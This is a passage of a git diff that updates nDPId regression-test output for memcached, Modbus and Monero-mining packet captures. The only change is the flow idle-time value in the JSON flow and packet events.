-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":1035,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1534343745954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 diff --git a/test/results/modbus.pcap.out b/test/results/modbus.pcap.out index 5fcd5b5c3..4c01fa645 100644 --- a/test/results/modbus.pcap.out +++ b/test/results/modbus.pcap.out @@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"modbus.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1223541953927} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7440000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7560000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":102,"total-skipped-flows":0,"total-l4-data-len":1173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1223541977037} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 102/102 diff --git a/test/results/monero.pcap.out b/test/results/monero.pcap.out index 10eed2dd0..68e7445fb 100644 --- a/test/results/monero.pcap.out +++ b/test/results/monero.pcap.out @@ -1,18 +1,18 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"monero.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1514196188350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 